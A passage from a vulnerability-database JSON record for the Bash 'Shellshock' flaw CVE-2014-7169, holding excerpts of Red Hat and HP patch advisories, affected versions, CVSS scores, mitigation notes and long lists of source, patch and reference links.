server):\n\nSource:\nbash-3.2-32.el5_9.3.src.rpm\n\ni386:\nbash-3.2-32.el5_9.3.i386.rpm\nbash-debuginfo-3.2-32.el5_9.3.i386.rpm\n\nia64:\nbash-3.2-32.el5_9.3.i386.rpm\nbash-3.2-32.el5_9.3.ia64.rpm\nbash-debuginfo-3.2-32.el5_9.3.i386.rpm\nbash-debuginfo-3.2-32.el5_9.3.ia64.rpm\n\nppc:\nbash-3.2-32.el5_9.3.ppc.rpm\nbash-debuginfo-3.2-32.el5_9.3.ppc.rpm\n\ns390x:\nbash-3.2-32.el5_9.3.s390x.rpm\nbash-debuginfo-3.2-32.el5_9.3.s390x.rpm\n\nx86_64:\nbash-3.2-32.el5_9.3.x86_64.rpm\nbash-debuginfo-3.2-32.el5_9.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\nx86_64:\nbash-4.1.2-15.el6_4.2.x86_64.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\nx86_64:\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\nbash-doc-4.1.2-15.el6_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux AUS (v. 6.2 server):\n\nSource:\nbash-4.1.2-9.el6_2.2.src.rpm\n\nx86_64:\nbash-4.1.2-9.el6_2.2.x86_64.rpm\nbash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\ni386:\nbash-4.1.2-15.el6_4.2.i686.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.i686.rpm\n\nppc64:\nbash-4.1.2-15.el6_4.2.ppc64.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm\n\ns390x:\nbash-4.1.2-15.el6_4.2.s390x.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm\n\nx86_64:\nbash-4.1.2-15.el6_4.2.x86_64.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.2):\n\nSource:\nbash-4.1.2-9.el6_2.2.src.rpm\n\nx86_64:\nbash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm\nbash-doc-4.1.2-9.el6_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\ni386:\nbash-debuginfo-4.1.2-15.el6_4.2.i686.rpm\nbash-doc-4.1.2-15.el6_4.2.i686.rpm\n\nppc64:\nbash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm\nbash-doc-4.1.2-15.el6_4.2.ppc64.rpm\n\ns390x:\nbash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm\nbash-doc-4.1.2-15.el6_4.2.s390x.rpm\n\nx86_64:\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\nbash-doc-4.1.2-15.el6_4.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-7169.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-7186.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-7187.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/1200223\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUJau9XlSAg2UNWIIRAhKkAKC931kAxA4S4exwT4uGhDr7uDFIKQCglKKS\nN0AJiOto/RXwBqHtbfr1wkM=\n=SeAK\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \nNote: all versions of HP Thin Pro and HP Smart Zero Core operating systems\nprior to version 5.1.0 are affected by this vulnerability. Following is a\ncomplete list of affected operating systems. \n\nHP ThinPro\n\nHP ThinPro 5.0 (released June 2014)\nHP ThinPro 4.4 (released November 2013)\nHP ThinPro 4.3 (released June 2013)\nHP ThinPro 4.2 (released November 2012)\nHP ThinPro 4.1 (released March 2012)\nHP ThinPro 3.2 (released November 2010)\nHP ThinPro 3.1 (released June 2010)\nHP ThinPro 3.0 (released November 2009)\nHP ThinPro 2.0 (released 2009)\nHP ThinPro 1.5 (released 2009)\nHP ThinPro 1.0 (released 2008)\n\nHP Smart Zero Core\n\nHP Smart Zero Core 5.0 (released June 2014)\nHP Smart Zero Core 4.4 (released November 2013)\nHP Smart Zero Core 4.3 (released June 2013)\nHP Smart Zero Core 4.2 (released November 2012)\nHP Smart Zero Core 4.1 (released March 2012)\nHP Smart Zero Core 4.0 (released March 2011)\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has released the following software updates to resolve the vulnerability. \nIf you participated in the ThinPro 5.1.0 beta program upgrade to the release\nversion as soon as it becomes available. \nThe update can be also downloaded directly from ftp://ftp.hp.com/pub/tcdebian\n/updates/5.0/service_packs/SecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86\n.xar\nOr via softpaq delivery at:\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\n\nHP ThinPro and HP Smart Zero Core (x86)\n v4.4.x\n A component update is currently available through Easy Update as:\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar . \nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar\nOr via softpaq delivery at:\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\n\nHP ThinPro and HP Smart Zero Core (ARM)\n v4.4.x\n A component update is currently available through Easy Update as:\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar . \n\n NOTE: The vCAS product is vulnerable only if DHCP is enabled. \n\nNOTE: HP recommends to not power-down or disconnect the vCAS until the update\nis available. \n\nMITIGATION INFORMATION\n\nA Shellshock attack requires the definition of an environment variable\nintroduced into Bash. The vCAS has three attack vectors: SSH, the lighttpd\nweb server, and the DHCP client. \n\n - The exploit does not elevate privileges. \n\nThe DHCP client uses Bash scripts and is vulnerable to Shellshock. The DHCP\nexploit can be mitigated by ensuring that DHCP is disabled on the vCAS. \n\n Note: HP strongly discourages the use of DHCP on the vCAS. \n\nThe web UI forces the vCAS user to assign a static IP address and change the\nhp-admin password. A vCAS user must manually configure DHCP for use on the\nvCAS. \n\nA vCAS user can verify that DHCP is disabled by inspecting the file\n\"/etc/network/interfaces\" and ensuring that the \"iface\" line for device\n\"eth0\" is set for a static IP", "sources": [ { "db": "NVD", "id": "CVE-2014-7169" }, { "db": "CERT/CC", "id": "VU#252743" }, { "db": "BID", "id": "70154" }, { "db": "VULMON", "id": "CVE-2014-7169" }, { "db": "PACKETSTORM", "id": "128665" }, { "db": "PACKETSTORM", "id": "130336" }, { "db": "PACKETSTORM", "id": "128753" }, { "db": "PACKETSTORM", "id": "128433" }, { "db": "PACKETSTORM", "id": "129069" }, { "db": "PACKETSTORM", "id": "131275" }, { "db": "PACKETSTORM", "id": "128456" }, { "db": "PACKETSTORM", "id": "128546" }, { "db": "PACKETSTORM", "id": "128509" } ], "trust": 2.79 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=36933", "trust": 1.5, "type": "exploit" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-7169" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-7169", "trust": 2.3 }, { "db": "CERT/CC", "id": "VU#252743", "trust": 2.2 }, { "db": "MCAFEE", "id": "SB10085", "trust": 1.4 }, { "db": "JUNIPER", "id": "JSA10648", "trust": 1.4 }, { "db": "SECUNIA", "id": "61618", "trust": 1.1 }, { "db": "SECUNIA", "id": "61641", "trust": 1.1 }, { "db": "SECUNIA", "id": "61622", "trust": 1.1 }, { "db": "SECUNIA", "id": "61603", "trust": 1.1 }, { "db": "SECUNIA", "id": "60055", "trust": 1.1 }, { "db": "SECUNIA", "id": "61287", "trust": 1.1 }, { "db": "SECUNIA", "id": "61654", "trust": 1.1 }, { "db": "SECUNIA", "id": "61188", "trust": 1.1 }, { "db": "SECUNIA", "id": "61313", "trust": 1.1 }, { "db": "SECUNIA", "id": "61700", "trust": 1.1 }, { "db": "SECUNIA", "id": "61552", "trust": 1.1 }, { "db": "SECUNIA", "id": "61780", "trust": 1.1 }, { "db": "SECUNIA", "id": "58200", "trust": 1.1 }, { "db": "SECUNIA", "id": "61550", "trust": 1.1 }, { "db": "SECUNIA", "id": "61565", "trust": 1.1 }, { "db": "SECUNIA", "id": "61619", "trust": 1.1 }, { "db": "SECUNIA", "id": "61479", "trust": 1.1 }, { "db": "SECUNIA", "id": "61312", "trust": 1.1 }, { "db": "SECUNIA", "id": "60193", "trust": 1.1 }, { "db": "SECUNIA", "id": "61129", "trust": 1.1 }, { "db": "SECUNIA", "id": "61703", "trust": 1.1 }, { "db": "SECUNIA", "id": "60433", "trust": 1.1 }, { "db": "SECUNIA", "id": "61128", "trust": 1.1 }, { "db": "SECUNIA", "id": "61873", "trust": 1.1 }, { "db": "SECUNIA", "id": "62228", "trust": 1.1 }, { "db": "SECUNIA", "id": "60063", "trust": 1.1 }, { "db": "SECUNIA", "id": "61816", "trust": 1.1 }, { "db": "SECUNIA", "id": "61711", "trust": 1.1 }, { "db": "SECUNIA", "id": "61633", "trust": 1.1 }, { "db": "SECUNIA", "id": "59737", "trust": 1.1 }, { "db": "SECUNIA", "id": "60034", "trust": 1.1 }, { "db": "SECUNIA", "id": "61643", "trust": 1.1 }, { "db": "SECUNIA", "id": "60947", "trust": 1.1 }, { "db": "SECUNIA", "id": "61485", "trust": 1.1 }, { "db": "SECUNIA", "id": "61676", "trust": 1.1 }, { "db": "SECUNIA", "id": "61503", "trust": 1.1 }, { "db": "SECUNIA", "id": "60044", "trust": 1.1 }, { "db": "SECUNIA", "id": "62343", "trust": 1.1 }, { "db": "SECUNIA", "id": "61626", "trust": 1.1 }, { "db": "SECUNIA", "id": "60325", "trust": 1.1 }, { "db": "SECUNIA", "id": "61291", "trust": 1.1 }, { "db": "SECUNIA", "id": "59272", "trust": 1.1 }, { "db": "SECUNIA", "id": "61328", "trust": 1.1 }, { "db": "SECUNIA", "id": "61283", "trust": 1.1 }, { "db": "SECUNIA", "id": "61855", "trust": 1.1 }, { "db": "SECUNIA", "id": "61442", "trust": 1.1 }, { "db": "SECUNIA", "id": "60024", "trust": 1.1 }, { "db": "SECUNIA", "id": "61715", "trust": 1.1 }, { "db": "SECUNIA", "id": "61471", "trust": 1.1 }, { "db": "SECUNIA", "id": "61857", "trust": 1.1 }, { "db": "SECUNIA", "id": "61065", "trust": 1.1 }, { "db": "SECUNIA", "id": "59907", "trust": 1.1 }, { "db": "SECUNIA", "id": "62312", "trust": 1.1 }, { "db": "USCERT", "id": "TA14-268A", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2014/09/24/32", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "128567", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "128517", "trust": 1.1 }, { "db": "JVN", "id": "JVN55667175", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2014-000126", "trust": 1.1 }, { "db": "EXPLOIT-DB", "id": "34879", "trust": 1.0 }, { "db": "JUNIPER", "id": "JSA10661", "trust": 0.3 }, { "db": "BID", "id": "70154", "trust": 0.3 }, { "db": "EXPLOITDB", "id": "34879", "trust": 0.1 }, { "db": "EXPLOITDB", "id": "36933", "trust": 0.1 }, { "db": "ICS CERT", "id": "ICSA-14-269-01A", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2014-7169", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128665", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130336", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128753", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128433", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129069", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131275", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128456", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128546", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128509", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "VULMON", "id": "CVE-2014-7169" }, { "db": "BID", "id": "70154" }, { "db": "PACKETSTORM", "id": "128665" }, { "db": "PACKETSTORM", "id": "130336" }, { "db": "PACKETSTORM", "id": "128753" }, { "db": "PACKETSTORM", "id": "128433" }, { "db": "PACKETSTORM", "id": "129069" }, { "db": "PACKETSTORM", "id": "131275" }, { "db": "PACKETSTORM", "id": "128456" }, { "db": "PACKETSTORM", "id": "128546" }, { "db": "PACKETSTORM", "id": "128509" }, { "db": "NVD", "id": "CVE-2014-7169" } ] }, "id": "VAR-201409-1155", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4019157454999999 }, "last_update_date": "2024-07-23T21:04:41.941000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/09/27/oracle_no_shellshock_patches_yet/" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/09/26/ico_shellshock_warning/" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/09/25/shellshock_bash_worm_type_fears/" }, { "title": "Ubuntu Security Notice: bash vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2363-2" }, { "title": "Ubuntu Security Notice: bash vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2363-1" }, { "title": "Debian CVElist Bug Report Logs: bash: CVE-2014-7169: Incomplete fix for CVE-2014-6271", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=7a56c10ff83e62f236b0dc330aab6c31" }, { "title": "Debian Security Advisories: DSA-3035-1 bash -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=f4f02191845c862da8b42c8e3db24b63" }, { "title": "Red Hat: CVE-2014-7169", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-7169" }, { "title": "Amazon Linux AMI: ALAS-2014-419", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-419" }, { "title": "VMware Security Advisories: VMware product updates address critical Bash security vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=86cb6b3955e100fdc9667a7ca916c772" }, { "title": "HP: HPSBHF03119 rev.3 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=hpsbhf03119" }, { "title": "Symantec Security Advisories: SA82 : GNU Bash Shellshock Command Injection Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=2b57ceaadfde2a8b03482273e1fd21ea" }, { "title": "Citrix Security Bulletins: Citrix XenServer Shellshock Security Update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=64ae0aae8269062686789e3a3fa1d2bf" }, { "title": "Tenable Security Advisories: [R7] Tenable Appliance Affected by GNU bash \u0027Shellshock\u0027 Vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2014-07" }, { "title": "Citrix Security Bulletins: Citrix Security Advisory for GNU Bash Shellshock Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=73443a6db89dc66fc6bcb49f85bfd1ab" }, { "title": "Splunk Security Announcements: Splunk response to \"shellshock\" vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=995d0135ab7f45978bdbc53bcd6ffc14" }, { "title": "cookbook_shellshock", "trust": 0.1, "url": "https://github.com/chefrycar/cookbook_shellshock " }, { "title": "patchme", "trust": 0.1, "url": "https://github.com/jackbezalel/patchme " }, { "title": "hackernews-headlines", "trust": 0.1, "url": "https://github.com/bodazhao/hackernews-headlines " }, { "title": "hacker-news-headlines", "trust": 0.1, "url": "https://github.com/bodazhao/hacker-news-headlines " }, { "title": "totalshares", "trust": 0.1, "url": "https://github.com/prashant-kumar/totalshares " }, { "title": "mysecurity-cookbook", "trust": 0.1, "url": "https://github.com/alexpop/mysecurity-cookbook " }, { "title": "Shell-Shock-Update", "trust": 0.1, "url": "https://github.com/umdterps/shell-shock-update " }, { "title": "bash-cve-2014-7169-cookbook", "trust": 0.1, "url": "https://github.com/gina-alaska/bash-cve-2014-7169-cookbook " }, { "title": "bash-vulnerability", "trust": 0.1, "url": "https://github.com/bacarrdy/bash-vulnerability " }, { "title": "poc-development", "trust": 0.1, "url": "https://github.com/h0n3yb/poc-development " }, { "title": "puppet-shellshock", "trust": 0.1, "url": "https://github.com/renanvicente/puppet-shellshock " }, { "title": "shellshock_salt_grain", "trust": 0.1, "url": "https://github.com/jcollie/shellshock_salt_grain " }, { "title": "bash-4.2-patched", "trust": 0.1, "url": "https://github.com/ricedu/bash-4.2-patched " }, { "title": "scripts", "trust": 0.1, "url": "https://github.com/omretterry/scripts " }, { "title": "macosx-bash-92-shellshock-patched", "trust": 0.1, "url": "https://github.com/ido/macosx-bash-92-shellshock-patched " }, { "title": "bash-shellshock", "trust": 0.1, "url": "https://github.com/dlitz/bash-shellshock " }, { "title": "Shellshock-Bash-Remote-Code-Execution-Vulnerability-and-Exploitation", "trust": 0.1, "url": "https://github.com/pbr94/shellshock-bash-remote-code-execution-vulnerability-and-exploitation " }, { "title": "smtp-shellshock", "trust": 0.1, "url": "https://github.com/blistergravy/smtp-shellshock " }, { "title": "patch-bash-shellshock", "trust": 0.1, "url": "https://github.com/jdauphant/patch-bash-shellshock " }, { "title": "exploit-CVE-2014-6271", "trust": 0.1, "url": "https://github.com/opsxcq/exploit-cve-2014-6271 " }, { "title": "Pentest-In-Docker", "trust": 0.1, "url": "https://github.com/swordfish-security/pentest-in-docker " }, { "title": "dokku-alt", "trust": 0.1, "url": "https://github.com/dokku-alt/dokku-alt " }, { "title": "linux-pentest", "trust": 0.1, "url": "https://github.com/ankh2054/linux-pentest " }, { "title": "Exploit-Shellshock", "trust": 0.1, "url": "https://github.com/mrigank-9594/exploit-shellshock " }, { "title": "w-test", "trust": 0.1, "url": "https://github.com/inspirion87/w-test " }, { "title": "Xpl-SHELLSHOCK-Ch3ck", "trust": 0.1, "url": "https://github.com/googleinurl/xpl-shellshock-ch3ck " }, { "title": "bashcheck", "trust": 0.1, "url": "https://github.com/hannob/bashcheck " }, { "title": "shocktrooper", "trust": 0.1, "url": "https://github.com/evank/shocktrooper " }, { "title": "ShellShockHunter", "trust": 0.1, "url": "https://github.com/mrcl0wnlab/shellshockhunter " }, { "title": "shellshockFixOSX", "trust": 0.1, "url": "https://github.com/opragel/shellshockfixosx " }, { "title": "shellshocker-pocs", "trust": 0.1, "url": "https://github.com/mubix/shellshocker-pocs " }, { "title": "Boot2root-CTFs-Writeups", "trust": 0.1, "url": "https://github.com/jean-francois-c/boot2root-ctfs " }, { "title": "Boot2root-CTFs-Writeups", "trust": 0.1, "url": "https://github.com/jean-francois-c/boot2root-ctfs-writeups " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/researcher-takes-wraps-off-two-undisclosed-shellshock-vulnerabilities-in-bash/108674/" }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/vmware-begins-to-patch-bash-issues-across-product-line/108632/" }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/bash-exploit-reported-first-round-of-patches-incomplete/108550/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-7169" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-78", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-7169" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140926-bash" }, { "trust": 2.2, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10085" }, { "trust": 2.0, "url": "https://access.redhat.com/articles/1200223" }, { "trust": 1.9, "url": "http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html" }, { "trust": 1.9, "url": "http://support.apple.com/kb/ht6495" }, { "trust": 1.9, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa82" }, { "trust": 1.9, "url": "https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html" }, { "trust": 1.6, "url": "https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/" }, { "trust": 1.6, "url": "http://rhn.redhat.com/errata/rhsa-2014-1311.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2014-1306.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2014-1312.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685749" }, { "trust": 1.4, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10648" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021272" }, { "trust": 1.4, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0010.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685914" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686084" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004898" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004897" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004915" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685604" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686131" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021279" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096315" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687079" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686246" }, { "trust": 1.2, "url": "http://www.kb.cert.org/vuls/id/252743" }, { "trust": 1.1, "url": "http://twitter.com/taviso/statuses/514887394294652929" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2014/09/24/32" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2363-1" }, { "trust": 1.1, "url": "http://www.us-cert.gov/ncas/alerts/ta14-268a" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-3035" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2363-2" }, { "trust": 1.1, "url": "https://www.suse.com/support/shellshock/" }, { "trust": 1.1, "url": "http://support.novell.com/security/cve/cve-2014-7169.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61626" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59737" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61641" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-3075.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61700" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61618" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1306.html" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-3077.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61676" }, { "trust": 1.1, "url": "http://www.novell.com/support/kb/doc.php?id=7015701" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61622" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-3078.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61479" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61619" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00042.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141216207813411\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00041.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00038.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141216668515282\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00048.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61485" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59907" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61654" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/128567/ca-technologies-gnu-bash-shellshock.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141235957116749\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61565" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61643" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61633" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61552" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141319209015420\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61283" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61603" }, { "trust": 1.1, "url": "http://www.novell.com/support/kb/doc.php?id=7015721" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61503" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61711" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61715" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61703" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2014/oct/0" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/128517/vmware-security-advisory-2014-0010.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00004.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60947" }, { "trust": 1.1, "url": "https://support.apple.com/kb/ht6535" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61188" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141345648114150\u0026w=2" }, { "trust": 1.1, "url": "http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141330425327438\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141330468527613\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60034" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61816" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685733" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61442" }, { "trust": 1.1, "url": "https://support.citrix.com/article/ctx200223" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60055" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61780" }, { "trust": 1.1, "url": 